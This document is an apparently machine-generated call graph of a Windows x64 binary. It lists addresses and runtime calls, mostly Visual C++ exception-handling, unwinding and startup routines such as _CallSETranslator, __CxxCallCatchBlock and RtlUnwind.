5737 7ffc2356f06c __FrameHandler3::FrameUnwindToEmptyState 13 API calls 5736->5737 5737->5744 5738 7ffc2356f058 13 API calls 5738->5739 5739->5736 5739->5738 5740 7ffc23565400 5739->5740 5741 7ffc235664b0 _CallSETranslator 13 API calls 5740->5741 5742 7ffc23565405 5741->5742 5754 7ffc23561940 RtlUnwind 5742->5754 5755 7ffc2356f5b0 5744->5755 5746 7ffc235664b0 _CallSETranslator 13 API calls 5745->5746 5747 7ffc23565374 5746->5747 5748 7ffc2356f044 5747->5748 5749 7ffc235664b0 _CallSETranslator 13 API calls 5748->5749 5750 7ffc23565379 RtlPcToFileHeader 5749->5750 5750->5731 5752 7ffc235664b0 _CallSETranslator 13 API calls 5751->5752 5753 7ffc235653b1 5752->5753 5753->5735 5754->5744 5756 7ffc2356f5ba 5755->5756 5757 7ffc23565462 5756->5757 5758 7ffc2356f790 IsProcessorFeaturePresent 5756->5758 5759 7ffc2356f7a7 5758->5759 5764 7ffc2356f864 RtlCaptureContext 5759->5764 5765 7ffc2356f87e RtlLookupFunctionEntry 5764->5765 5766 7ffc2356f7ba 5765->5766 5767 7ffc2356f894 RtlVirtualUnwind 5765->5767 5768 7ffc2356f75c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5766->5768 5767->5765 5767->5766 5769 7ffc235642c0 5770 7ffc235664b0 _CallSETranslator 13 API calls 5769->5770 5771 7ffc235642f5 5770->5771 5772 7ffc235664b0 _CallSETranslator 13 API calls 5771->5772 5773 7ffc23564303 __C_specific_handler 5772->5773 5774 7ffc235664b0 _CallSETranslator 13 API calls 5773->5774 5775 7ffc23564347 5774->5775 5776 7ffc235664b0 _CallSETranslator 13 API calls 5775->5776 5777 7ffc23564350 5776->5777 5778 7ffc235664b0 _CallSETranslator 13 API calls 5777->5778 5779 7ffc23564359 5778->5779 5780 7ffc2356efb0 _CreateFrameInfo 13 API calls 5779->5780 5781 7ffc2356436b 5780->5781 5782 7ffc235664b0 _CallSETranslator 13 API calls 5781->5782 5783 7ffc23564389 __CxxCallCatchBlock 5781->5783 5782->5783 5792 7ffc2356eff0 5783->5792 5785 7ffc23564463 __CxxCallCatchBlock 5786 7ffc235664b0 _CallSETranslator 13 API calls 5785->5786 5787 7ffc23564476 5786->5787 5789 7ffc235664b0 _CallSETranslator 13 API calls 5787->5789 5791 7ffc2356447f 5789->5791 5793 7ffc235664b0 _CallSETranslator 13 API calls 5792->5793 5794 7ffc2356f002 5793->5794 5795 7ffc2356f027 abort 5794->5795 5797 7ffc235664b0 _CallSETranslator 13 API calls 5794->5797 5796 7ffc2356f02e 5795->5796 5798 7ffc235664b0 _CallSETranslator 13 API calls 5796->5798 5799 7ffc2356f00d 5797->5799 5800 7ffc2356443a 5798->5800 5799->5795 5799->5796 5800->5785 5801 7ffc235620f0 5800->5801 5802 7ffc235664b0 _CallSETranslator 13 API calls 5801->5802 5803 7ffc235620fe 5802->5803 5803->5785 6312 7ffc23566440 6313 7ffc23566449 6312->6313 6314 7ffc2356645b 6312->6314 6313->6314 6315 7ffc23566455 free 6313->6315 6315->6314 5804 7ffc2356fdbf 5807 7ffc23562160 5804->5807 5808 7ffc235621a5 5807->5808 5811 7ffc23562178 5807->5811 5809 7ffc235664b0 _CallSETranslator 13 API calls 5808->5809 5812 7ffc235621aa 5809->5812 5810 7ffc235621b5 5811->5808 5811->5810 5813 7ffc235664b0 _CallSETranslator 13 API calls 5811->5813 5812->5810 5815 7ffc235664b0 _CallSETranslator 13 API calls 5812->5815 5814 7ffc2356218d 5813->5814 5816 7ffc235664b0 _CallSETranslator 13 API calls 5814->5816 5815->5810 5817 7ffc2356219a terminate 5816->5817 5817->5808 5818 7ffc235641c4 5821 7ffc23565ef0 5818->5821 5822 7ffc23565f11 5821->5822 5823 7ffc235641ed 5821->5823 5822->5823 5824 7ffc23565f26 malloc 5822->5824 5825 7ffc23565f38 strcpy_s 5824->5825 5826 7ffc23565f55 free 5824->5826 5825->5826 5826->5823 5827 7ffc235621d0 5828 7ffc235664b0 _CallSETranslator 13 API calls 5827->5828 5829 7ffc235621e1 5828->5829 5830 7ffc235621f8 5829->5830 5832 7ffc235622a0 5829->5832 5833 7ffc235622b2 5832->5833 5834 7ffc2356233f abort 5832->5834 5833->5834 5835 7ffc235622d9 5833->5835 5835->5830 5836 7ffc235662d0 5837 7ffc235664b0 _CallSETranslator 13 API calls 5836->5837 5838 7ffc235662d9 terminate 5837->5838 5840 7ffc235664b0 _CallSETranslator 13 API calls 5838->5840 5841 7ffc23566302 5840->5841 5842 7ffc235664b0 _CallSETranslator 13 API calls 5841->5842 5843 7ffc2356630b 5842->5843 6319 7ffc23566250 6322 7ffc23566590 6319->6322 6323 7ffc23566259 6322->6323 6324 7ffc235665a7 GetLastError 6322->6324 6325 7ffc2356682c __vcrt_getptd_noinit 7 API calls 6324->6325 6326 7ffc235665ba SetLastError 6325->6326 6326->6323 6327 7ffc23564254 6328 7ffc23565f80 6327->6328 6329 7ffc23565f8f free 6328->6329 6330 7ffc23565f98 6328->6330 6329->6330 6331 7ffc23564d54 6336 7ffc23564c14 __CxxCallCatchBlock 6331->6336 6332 7ffc23564d71 6333 7ffc235664b0 _CallSETranslator 13 API calls 6332->6333 6334 7ffc23564d76 6333->6334 6335 7ffc23564d81 6334->6335 6337 7ffc235664b0 _CallSETranslator 13 API calls 6334->6337 6338 7ffc2356f5b0 DName::DName 8 API calls 6335->6338 6336->6332 6340 7ffc2356f06c __FrameHandler3::FrameUnwindToEmptyState 13 API calls 6336->6340 6337->6335 6339 7ffc23564d94 6338->6339 6340->6336 5847 7ffc2356fcd4 5850 7ffc23564910 5847->5850 5855 7ffc23564888 5850->5855 5853 7ffc23564930 5854 7ffc235664b0 _CallSETranslator 13 API calls 5854->5853 5856 7ffc235648aa 5855->5856 5858 7ffc235648f3 5855->5858 5857 7ffc235664b0 _CallSETranslator 13 API calls 5856->5857 5856->5858 5857->5858 5858->5853 5858->5854 5867 7ff79738b920 5870 7ff79738c110 5867->5870 5871 7ff79738c133 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5870->5871 5872 7ff79738b929 5870->5872 5871->5872 6341 7ffc23564220 6342 7ffc23565ef0 3 API calls 6341->6342 6343 7ffc23564249 6342->6343 5873 7ffc2356fba0 5874 7ffc2356fc25 5873->5874 5875 7ffc2356fbb8 5873->5875 5875->5874 5876 7ffc235664b0 _CallSETranslator 13 API calls 5875->5876 5877 7ffc2356fc05 5876->5877 5878 7ffc235664b0 _CallSETranslator 13 API calls 5877->5878 5879 7ffc2356fc1a terminate 5878->5879 5879->5874 5880 7ffc2356f0a0 5881 7ffc2356f0b0 5880->5881 5882 7ffc235664b0 _CallSETranslator 13 API calls 5881->5882 5883 7ffc2356f0da 5882->5883 5884 7ffc235664b0 _CallSETranslator 13 API calls 5883->5884 5885 7ffc2356f0e7 5884->5885 5886 7ffc235664b0 _CallSETranslator 13 API calls 5885->5886 5887 7ffc2356f0f0 5886->5887 5890 7ffc23563bbc 5887->5890 5891 7ffc23563be9 __C_specific_handler 5890->5891 5892 7ffc235664b0 _CallSETranslator 13 API calls 5891->5892 5893 7ffc23563bee 5892->5893 5896 7ffc23563c48 5893->5896 5898 7ffc23563ccd 5893->5898 5907 7ffc23563c94 5893->5907 5894 7ffc23563d3b 5894->5907 5939 7ffc23562a44 5894->5939 5895 7ffc23563cba 5930 7ffc2356e7a0 5895->5930 5896->5895 5905 7ffc23563c79 5896->5905 5896->5907 5909 7ffc2356e1e8 5896->5909 5899 7ffc2356f044 Is_bad_exception_allowed 13 API calls 5898->5899 5901 7ffc23563cec 5898->5901 5899->5901 5901->5894 5904 7ffc2356f058 13 API calls 5901->5904 5901->5907 5903 7ffc23563cb3 abort 5903->5895 5904->5894 5905->5895 5905->5903 5906 7ffc23563c83 5905->5906 5913 7ffc23564940 5906->5913 5910 7ffc2356e248 abort 5909->5910 5911 7ffc2356e1f6 5909->5911 5911->5910 5912 7ffc2356e207 5911->5912 5912->5905 5914 7ffc2356f044 Is_bad_exception_allowed 13 API calls 5913->5914 5915 7ffc2356496f 5914->5915 5997 7ffc2356e13c 5915->5997 5918 7ffc235664b0 _CallSETranslator 13 API calls 5927 7ffc2356498c __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 5918->5927 5919 7ffc23564a8a 5920 7ffc235664b0 _CallSETranslator 13 API calls 5919->5920 5922 7ffc23564a8f 5920->5922 5921 7ffc23564a83 abort 5921->5919 5923 7ffc235664b0 _CallSETranslator 13 API calls 5922->5923 5924 7ffc23564a9a 5922->5924 5923->5924 5925 7ffc23564aae __FrameHandler3::GetHandlerSearchState 5924->5925 5926 7ffc23564aa7 abort 5924->5926 5925->5907 5926->5925 5927->5919 5927->5921 5928 7ffc2356f044 13 API calls Is_bad_exception_allowed 5927->5928 5929 7ffc2356f06c __FrameHandler3::FrameUnwindToEmptyState 13 API calls 5927->5929 5928->5927 5929->5927 6001 7ffc2356e838 5930->6001 5937 7ffc23564940 __FrameHandler3::FrameUnwindToEmptyState 16 API calls 5938 7ffc2356e7f4 5937->5938 5938->5907 6014 7ffc23564db0 5939->6014 5941 7ffc23562edf abort 5942 7ffc23562ee6 5941->5942 5943 7ffc2356f5b0 DName::DName 8 API calls 5942->5943 5945 7ffc23562ef2 5943->5945 5944 7ffc23562e96 5944->5941 5984 7ffc23562e94 5944->5984 6073 7ffc23563430 5944->6073 5945->5907 5946 7ffc23562b94 5946->5944 5948 7ffc23562bcc 5946->5948 5947 7ffc235664b0 _CallSETranslator 13 API calls 5951 7ffc23562ed8 5947->5951 5952 7ffc23562d9f 5948->5952 6037 7ffc2356e928 5948->6037 5951->5941 5951->5942 5956 7ffc23562dc9 5952->5956 5958 7ffc2356f044 Is_bad_exception_allowed 13 API calls 5952->5958 5952->5984 5953 7ffc235664b0 _CallSETranslator 13 API calls 5955 7ffc23562af9 5953->5955 5955->5942 5957 7ffc235664b0 _CallSETranslator 13 API calls 5955->5957 5961 7ffc23562deb 5956->5961 5956->5984 6065 7ffc2356e76c 5956->6065 5959 7ffc23562b09 5957->5959 5958->5956 5962 7ffc235664b0 _CallSETranslator 13 API calls 5959->5962 5963 7ffc23562e1b 5961->5963 5965 7ffc235664b0 _CallSETranslator 13 API calls 5961->5965 5961->5984 5964 7ffc23562b12 5962->5964 5967 7ffc23562e26 5963->5967 5970 7ffc2356f044 Is_bad_exception_allowed 13 API calls 5963->5970 5966 7ffc2356f084 13 API calls 5964->5966 5968 7ffc23562e02 5965->5968 5969 7ffc23562b29 5966->5969 5973 7ffc23564e48 14 API calls 5967->5973 5972 7ffc235664b0 _CallSETranslator 13 API calls 5968->5972 5969->5941 5975 7ffc235664b0 _CallSETranslator 13 API calls 5969->5975 5970->5967 5971 7ffc23562bf8 5971->5952 5980 7ffc2356f058 13 API calls 5971->5980 6042 7ffc23563938 5971->6042 6056 7ffc2356289c 5971->6056 5974 7ffc23562e0b terminate 5972->5974 5976 7ffc23562e3c 5973->5976 5974->5963 5978 7ffc23562b54 5975->5978 5977 7ffc2356e838 _GetEstablisherFrame 2 API calls 5976->5977 5976->5984 5979 7ffc23562e56 5977->5979 5978->5946 5981 7ffc235664b0 _CallSETranslator 13 API calls 5978->5981 6070 7ffc2356ebc4 RtlUnwindEx 5979->6070 5980->5971 5983 7ffc23562b60 5981->5983 5986 7ffc235664b0 _CallSETranslator 13 API calls 5983->5986 5984->5947 5987 7ffc23562b69 5986->5987 6026 7ffc23564e48 5987->6026 5993 7ffc23562b8d terminate 5993->5946 5994 7ffc23562f06 __CxxCallCatchBlock std::bad_alloc::bad_alloc 5995 7ffc23566190 2 API calls 5994->5995 5996 7ffc23562f29 5995->5996 5998 7ffc2356e153 5997->5998 5999 7ffc23564985 5997->5999 6000 7ffc2356e1e8 __GetCurrentState abort 5998->6000 5999->5918 6000->5999 6002 7ffc2356e1d8 __FrameHandler3::ExecutionInCatch abort 6001->6002 6005 7ffc2356e866 6002->6005 6003 7ffc2356e7bf 6006 7ffc2356e1d8 6003->6006 6004 7ffc2356e88f RtlLookupFunctionEntry 6004->6005 6005->6003 6005->6004 6007 7ffc2356e1e8 6006->6007 6008 7ffc2356e248 abort 6007->6008 6009 7ffc2356e207 6007->6009 6010 7ffc2356e5f4 6009->6010 6011 7ffc2356e60b 6010->6011 6012 7ffc2356e633 6011->6012 6013 7ffc235664b0 _CallSETranslator 13 API calls 6011->6013 6012->5937 6013->6011 6015 7ffc2356e1d8 __FrameHandler3::ExecutionInCatch abort 6014->6015 6016 7ffc23564dd5 6015->6016 6017 7ffc2356e838 _GetEstablisherFrame 2 API calls 6016->6017 6018 7ffc23564dea 6017->6018 6089 7ffc2356e164 6018->6089 6021 7ffc23564dfc __FrameHandler3::GetHandlerSearchState 6092 7ffc2356e19c 6021->6092 6022 7ffc23564e1f 6023 7ffc2356e164 __GetUnwindTryBlock 2 API calls 6022->6023 6024 7ffc23562aad 6023->6024 6024->5941 6024->5946 6024->5953 6027 7ffc23564f2f abort 6026->6027 6030 7ffc23564e73 6026->6030 6028 7ffc23562b79 6028->5946 6033 7ffc23564f38 6028->6033 6029 7ffc2356f058 13 API calls 6029->6030 6030->6028 6030->6029 6031 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6030->6031 6032 7ffc23563938 13 API calls 6030->6032 6031->6030 6032->6030 6034 7ffc23564f55 Is_bad_exception_allowed 6033->6034 6036 7ffc23562b85 6033->6036 6035 7ffc2356f044 13 API calls Is_bad_exception_allowed 6034->6035 6034->6036 6035->6034 6036->5993 6036->5994 6038 7ffc2356e1d8 __FrameHandler3::ExecutionInCatch abort 6037->6038 6039 7ffc2356e967 6038->6039 6040 7ffc2356ea61 abort 6039->6040 6041 7ffc2356e975 6039->6041 6041->5971 6043 7ffc23563965 6042->6043 6055 7ffc235639f4 6042->6055 6044 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6043->6044 6045 7ffc2356396e 6044->6045 6046 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6045->6046 6047 7ffc23563987 6045->6047 6045->6055 6046->6047 6048 7ffc235639b3 6047->6048 6049 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6047->6049 6047->6055 6050 7ffc2356f058 13 API calls 6048->6050 6049->6048 6052 7ffc235639c7 6050->6052 6051 7ffc235639e0 6054 7ffc2356f058 13 API calls 6051->6054 6052->6051 6053 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6052->6053 6052->6055 6053->6051 6054->6055 6055->5971 6057 7ffc2356e838 _GetEstablisherFrame 2 API calls 6056->6057 6058 7ffc235628d9 6057->6058 6059 7ffc235628ff 6058->6059 6095 7ffc23562714 6058->6095 6061 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6059->6061 6062 7ffc23562911 6061->6062 6063 7ffc2356ebc4 9 API calls 6062->6063 6064 7ffc23562955 6063->6064 6064->5971 6066 7ffc2356e1d8 __FrameHandler3::ExecutionInCatch abort 6065->6066 6067 7ffc2356e780 6066->6067 6068 7ffc2356e5f4 _CatchTryBlock 13 API calls 6067->6068 6069 7ffc2356e78a 6068->6069 6069->5961 6071 7ffc2356f5b0 DName::DName 8 API calls 6070->6071 6072 7ffc2356ecbe 6071->6072 6072->5984 6074 7ffc23563466 6073->6074 6085 7ffc235634d4 6073->6085 6075 7ffc235664b0 _CallSETranslator 13 API calls 6074->6075 6076 7ffc2356346b 6075->6076 6077 7ffc235634d0 6076->6077 6078 7ffc2356347a EncodePointer 6076->6078 6080 7ffc2356363f abort 6077->6080 6081 7ffc23563509 6077->6081 6077->6085 6079 7ffc235664b0 _CallSETranslator 13 API calls 6078->6079 6083 7ffc2356348a 6079->6083 6082 7ffc2356e928 2 API calls 6081->6082 6088 7ffc23563526 6082->6088 6083->6077 6124 7ffc2356e54c 6083->6124 6085->5984 6086 7ffc2356f044 13 API calls Is_bad_exception_allowed 6086->6088 6087 7ffc2356289c 30 API calls 6087->6088 6088->6085 6088->6086 6088->6087 6090 7ffc2356e838 _GetEstablisherFrame 2 API calls 6089->6090 6091 7ffc23564df8 6090->6091 6091->6021 6091->6022 6093 7ffc2356e838 _GetEstablisherFrame 2 API calls 6092->6093 6094 7ffc2356e1b6 6093->6094 6094->6024 6096 7ffc23562736 6095->6096 6104 7ffc23562348 6096->6104 6098 7ffc23562747 6100 7ffc23562788 __AdjustPointer 6098->6100 6101 7ffc2356274c __AdjustPointer 6098->6101 6099 7ffc2356276b 6099->6059 6100->6099 6102 7ffc2356f058 13 API calls 6100->6102 6101->6099 6103 7ffc2356f058 13 API calls 6101->6103 6102->6099 6103->6099 6105 7ffc23562375 6104->6105 6107 7ffc2356237e 6104->6107 6106 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6105->6106 6106->6107 6108 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6107->6108 6116 7ffc2356239d 6107->6116 6123 7ffc235623f8 __AdjustPointer 6107->6123 6108->6116 6109 7ffc23562406 6110 7ffc23562424 6109->6110 6111 7ffc2356241e abort 6109->6111 6109->6123 6112 7ffc23562472 6110->6112 6113 7ffc2356246c abort 6110->6113 6110->6123 6111->6110 6114 7ffc2356f058 13 API calls 6112->6114 6119 7ffc23562481 6112->6119 6113->6112 6114->6119 6115 7ffc23562400 abort 6115->6109 6116->6109 6116->6115 6116->6123 6117 7ffc23562502 abort abort 6117->6123 6118 7ffc235624bd abort 6121 7ffc235624c3 6118->6121 6119->6118 6119->6121 6119->6123 6120 7ffc235624d7 6120->6117 6120->6123 6121->6117 6121->6120 6122 7ffc2356f058 13 API calls 6121->6122 6122->6120 6123->6098 6125 7ffc235664b0 _CallSETranslator 13 API calls 6124->6125 6126 7ffc2356e578 6125->6126 6126->6077 6127 7ffc2356fd9c 6128 7ffc235664b0 _CallSETranslator 13 API calls 6127->6128 6129 7ffc2356fdaa 6128->6129 6130 7ffc2356fdb5 6129->6130 6131 7ffc235664b0 _CallSETranslator 13 API calls 6129->6131 6131->6130 6132 7ffc23565caa 6133 7ffc23565cbb 6132->6133 6134 7ffc23566190 2 API calls 6133->6134 6135 7ffc23565ccc 6134->6135 6136 7ffc23565d3c RtlPcToFileHeader 6135->6136 6137 7ffc23565cfa 6135->6137 6138 7ffc23565d5a FindMITargetTypeInstance 6135->6138 6136->6138 6138->6137 6139 7ffc23566190 2 API calls 6138->6139 6140 7ffc23565e34 6139->6140 6141 7ffc23565e4b 6140->6141 6142 7ffc23565e85 6140->6142 6143 7ffc23565e5a RtlPcToFileHeader 6141->6143 6146 7ffc23565e6f 6141->6146 6144 7ffc23566190 2 API calls 6142->6144 6143->6146 6144->6146 6145 7ffc23565e7f 6146->6145 6147 7ffc23566190 2 API calls 6146->6147 6148 7ffc23565eca 6147->6148 6149 7ffc23566190 2 API calls 6148->6149 6150 7ffc23565eed 6149->6150 6151 7ffc235644b0 6152 7ffc235664b0 _CallSETranslator 13 API calls 6151->6152 6153 7ffc235644fd 6152->6153 6154 7ffc235664b0 _CallSETranslator 13 API calls 6153->6154 6155 7ffc2356450b __C_specific_handler 6154->6155 6156 7ffc235664b0 _CallSETranslator 13 API calls 6155->6156 6157 7ffc23564564 6156->6157 6158 7ffc235664b0 _CallSETranslator 13 API calls 6157->6158 6159 7ffc2356456d 6158->6159 6160 7ffc235664b0 _CallSETranslator 13 API calls 6159->6160 6161 7ffc23564576 6160->6161 6162 7ffc2356efb0 _CreateFrameInfo 13 API calls 6161->6162 6163 7ffc2356458b 6162->6163 6164 7ffc235664b0 _CallSETranslator 13 API calls 6163->6164 6165 7ffc235645a9 6163->6165 6164->6165 6166 7ffc235645e4 abort 6165->6166 6167 7ffc235645dd 6165->6167 6166->6167 6168 7ffc2356eff0 __CxxCallCatchBlock 14 API calls 6167->6168 6172 7ffc23564685 6168->6172 6169 7ffc235646ae __CxxCallCatchBlock 6170 7ffc235664b0 _CallSETranslator 13 API calls 6169->6170 6171 7ffc235646c1 6170->6171 6173 7ffc235664b0 _CallSETranslator 13 API calls 6171->6173 6172->6169 6174 7ffc235620f0 __CxxCallCatchBlock 13 API calls 6172->6174 6175 7ffc235646ca 6173->6175 6174->6169 6176 7ffc235664b0 _CallSETranslator 13 API calls 6175->6176 6177 7ffc235646d3 6176->6177 6178 7ffc235664b0 _CallSETranslator 13 API calls 6177->6178 6179 7ffc235646e2 6178->6179 6344 7ffc23562230 6345 7ffc235664b0 _CallSETranslator 13 API calls 6344->6345 6346 7ffc23562239 6345->6346 6347 7ffc23566230 6348 7ffc23566590 __vcrt_getptd_noinit 9 API calls 6347->6348 6349 7ffc23566239 6348->6349 6180 7ffc235627b9 abort 6181 7ffc235627c0 6180->6181 6350 7ffc2356f138 6351 7ffc235664b0 _CallSETranslator 13 API calls 6350->6351 6352 7ffc2356f17a 6351->6352 6353 7ffc235664b0 _CallSETranslator 13 API calls 6352->6353 6354 7ffc2356f187 6353->6354 6355 7ffc235664b0 _CallSETranslator 13 API calls 6354->6355 6356 7ffc2356f190 6355->6356 6359 7ffc23563de4 6356->6359 6360 7ffc23563e13 __C_specific_handler 6359->6360 6361 7ffc235664b0 _CallSETranslator 13 API calls 6360->6361 6362 7ffc23563e18 6361->6362 6367 7ffc23563f7d 6362->6367 6371 7ffc23563e68 6362->6371 6372 7ffc23563f1d 6362->6372 6363 7ffc23563f6a 6397 7ffc2356e804 6363->6397 6364 7ffc23563fc2 6364->6372 6401 7ffc23562f2c 6364->6401 6367->6364 6369 7ffc2356f058 13 API calls 6367->6369 6367->6372 6368 7ffc23563f63 abort 6368->6363 6369->6364 6370 7ffc23563f0f 6374 7ffc23564acc 6370->6374 6371->6363 6371->6368 6371->6370 6371->6372 6375 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6374->6375 6377 7ffc23564b1c 6375->6377 6376 7ffc23564b51 6379 7ffc235664b0 _CallSETranslator 13 API calls 6376->6379 6377->6376 6378 7ffc235664b0 _CallSETranslator 13 API calls 6377->6378 6380 7ffc23564b3c 6378->6380 6381 7ffc23564b56 6379->6381 6382 7ffc23564b42 6380->6382 6383 7ffc23564b4a abort 6380->6383 6381->6382 6385 7ffc235664b0 _CallSETranslator 13 API calls 6381->6385 6384 7ffc235664b0 _CallSETranslator 13 API calls 6382->6384 6383->6376 6392 7ffc23564b75 __CxxCallCatchBlock 6384->6392 6386 7ffc23564b61 6385->6386 6387 7ffc235664b0 _CallSETranslator 13 API calls 6386->6387 6387->6382 6388 7ffc23564d71 6389 7ffc235664b0 _CallSETranslator 13 API calls 6388->6389 6390 7ffc23564d76 6389->6390 6391 7ffc23564d81 6390->6391 6393 7ffc235664b0 _CallSETranslator 13 API calls 6390->6393 6394 7ffc2356f5b0 DName::DName 8 API calls 6391->6394 6392->6388 6396 7ffc2356f06c __FrameHandler3::FrameUnwindToEmptyState 13 API calls 6392->6396 6393->6391 6395 7ffc23564d94 6394->6395 6395->6372 6396->6392 6398 7ffc2356e816 6397->6398 6399 7ffc23564acc 22 API calls 6398->6399 6400 7ffc2356e831 6399->6400 6400->6372 6402 7ffc23562f8e 6401->6402 6403 7ffc23562fad 6402->6403 6404 7ffc23562f96 6402->6404 6406 7ffc235664b0 _CallSETranslator 13 API calls 6403->6406 6405 7ffc235664b0 _CallSETranslator 13 API calls 6404->6405 6409 7ffc23562f9b 6405->6409 6407 7ffc23562fb2 6406->6407 6407->6409 6411 7ffc235664b0 _CallSETranslator 13 API calls 6407->6411 6408 7ffc235633e4 abort 6410 7ffc235633eb 6408->6410 6409->6408 6418 7ffc235664b0 _CallSETranslator 13 API calls 6409->6418 6446 7ffc235630e3 6409->6446 6412 7ffc2356f5b0 DName::DName 8 API calls 6410->6412 6413 7ffc23562fbd 6411->6413 6414 7ffc235633f7 6412->6414 6415 7ffc235664b0 _CallSETranslator 13 API calls 6413->6415 6414->6372 6415->6409 6416 7ffc235633a0 6416->6408 6417 7ffc235633d8 6416->6417 6474 7ffc23563648 6416->6474 6419 7ffc235664b0 _CallSETranslator 13 API calls 6417->6419 6420 7ffc2356304d 6418->6420 6422 7ffc235633dd 6419->6422 6420->6410 6423 7ffc235664b0 _CallSETranslator 13 API calls 6420->6423 6422->6408 6422->6410 6424 7ffc2356305d 6423->6424 6425 7ffc235664b0 _CallSETranslator 13 API calls 6424->6425 6426 7ffc23563066 6425->6426 6429 7ffc2356f084 13 API calls 6426->6429 6427 7ffc2356336b 6427->6417 6428 7ffc235664b0 _CallSETranslator 13 API calls 6427->6428 6430 7ffc2356338c 6428->6430 6431 7ffc23563078 6429->6431 6432 7ffc235664b0 _CallSETranslator 13 API calls 6430->6432 6431->6408 6434 7ffc235664b0 _CallSETranslator 13 API calls 6431->6434 6433 7ffc23563395 terminate 6432->6433 6433->6416 6435 7ffc235630a3 6434->6435 6436 7ffc235664b0 _CallSETranslator 13 API calls 6435->6436 6435->6446 6437 7ffc235630af 6436->6437 6438 7ffc235664b0 _CallSETranslator 13 API calls 6437->6438 6439 7ffc235630b8 6438->6439 6441 7ffc23564e48 14 API calls 6439->6441 6440 7ffc2356f058 13 API calls 6440->6446 6442 7ffc235630c8 6441->6442 6444 7ffc23564f38 Is_bad_exception_allowed 13 API calls 6442->6444 6442->6446 6445 7ffc235630d4 6444->6445 6447 7ffc235630dc terminate 6445->6447 6449 7ffc2356340b __CxxCallCatchBlock std::bad_alloc::bad_alloc 6445->6449 6446->6416 6446->6427 6446->6440 6452 7ffc23563a78 6446->6452 6466 7ffc23562970 6446->6466 6447->6446 6450 7ffc23566190 2 API calls 6449->6450 6451 7ffc2356342e 6450->6451 6453 7ffc23563aa5 6452->6453 6464 7ffc23563b35 6452->6464 6454 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6453->6454 6455 7ffc23563aae 6454->6455 6456 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6455->6456 6457 7ffc23563ac7 6455->6457 6455->6464 6456->6457 6458 7ffc23563af4 6457->6458 6459 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6457->6459 6457->6464 6460 7ffc2356f058 13 API calls 6458->6460 6459->6458 6461 7ffc23563b08 6460->6461 6462 7ffc23563b21 6461->6462 6463 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6461->6463 6461->6464 6465 7ffc2356f058 13 API calls 6462->6465 6463->6462 6464->6446 6465->6464 6467 7ffc235629ad 6466->6467 6468 7ffc235629d3 6467->6468 6490 7ffc235627d8 6467->6490 6470 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6468->6470 6471 7ffc235629e5 6470->6471 6499 7ffc2356ecc8 RtlUnwindEx 6471->6499 6475 7ffc23563911 6474->6475 6476 7ffc2356369c 6474->6476 6477 7ffc2356f5b0 DName::DName 8 API calls 6475->6477 6478 7ffc235664b0 _CallSETranslator 13 API calls 6476->6478 6479 7ffc2356391d 6477->6479 6480 7ffc235636a1 6478->6480 6479->6417 6481 7ffc23563708 6480->6481 6482 7ffc235636b6 EncodePointer 6480->6482 6481->6475 6484 7ffc23563931 abort 6481->6484 6488 7ffc2356372a 6481->6488 6483 7ffc235664b0 _CallSETranslator 13 API calls 6482->6483 6485 7ffc235636c6 6483->6485 6485->6481 6522 7ffc2356e5a0 6485->6522 6487 7ffc23562970 28 API calls 6487->6488 6488->6475 6488->6487 6489 7ffc2356f044 13 API calls Is_bad_exception_allowed 6488->6489 6489->6488 6491 7ffc235627fb 6490->6491 6502 7ffc2356252c 6491->6502 6493 7ffc2356280c 6494 7ffc23562811 __AdjustPointer 6493->6494 6495 7ffc2356284d __AdjustPointer 6493->6495 6496 7ffc23562830 6494->6496 6498 7ffc2356f058 13 API calls 6494->6498 6495->6496 6497 7ffc2356f058 13 API calls 6495->6497 6496->6468 6497->6496 6498->6496 6500 7ffc2356f5b0 DName::DName 8 API calls 6499->6500 6501 7ffc23562a29 6500->6501 6501->6446 6503 7ffc23562559 6502->6503 6505 7ffc23562562 6502->6505 6504 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6503->6504 6504->6505 6506 7ffc2356f044 Is_bad_exception_allowed 13 API calls 6505->6506 6512 7ffc23562581 6505->6512 6521 7ffc235625de __AdjustPointer 6505->6521 6506->6512 6507 7ffc235625ec 6508 7ffc2356260b 6507->6508 6509 7ffc23562605 abort 6507->6509 6507->6521 6510 7ffc23562659 6508->6510 6511 7ffc23562653 abort 6508->6511 6508->6521 6509->6508 6513 7ffc2356f058 13 API calls 6510->6513 6516 7ffc23562668 6510->6516 6511->6510 6512->6507 6514 7ffc235625e6 abort 6512->6514 6512->6521 6513->6516 6514->6507 6515 7ffc235626e9 abort abort 6515->6521 6517 7ffc235626a4 abort 6516->6517 6518 7ffc235626aa 6516->6518 6516->6521 6517->6518 6518->6515 6519 7ffc235626be 6518->6519 6520 7ffc2356f058 13 API calls 6518->6520 6519->6515 6519->6521 6520->6519 6521->6493 6523 7ffc235664b0 _CallSETranslator 13 API calls 6522->6523 6524 7ffc2356e5cc 6523->6524 6524->6481 6182 7ffc235643ba 6183 7ffc235664b0 _CallSETranslator 13 API calls 6182->6183 6186 7ffc235643c7 __CxxCallCatchBlock 6183->6186 6184 7ffc2356440b RaiseException 6185 7ffc23564432 6184->6185 6187 7ffc2356eff0 __CxxCallCatchBlock 14 API calls 6185->6187 6186->6184 6188 7ffc2356443a 6187->6188 6192 7ffc235620f0 __CxxCallCatchBlock 13 API calls 6188->6192 6194 7ffc23564463 __CxxCallCatchBlock 6188->6194 6189 7ffc235664b0 _CallSETranslator 13 API calls 6190 7ffc23564476 6189->6190 6191 7ffc235664b0 _CallSETranslator 13 API calls 6190->6191 6193 7ffc2356447f 6191->6193 6192->6194 6194->6189 6195 7ffc2356fe82 6196 7ffc235664b0 _CallSETranslator 13 API calls 6195->6196 6197 7ffc2356fe99 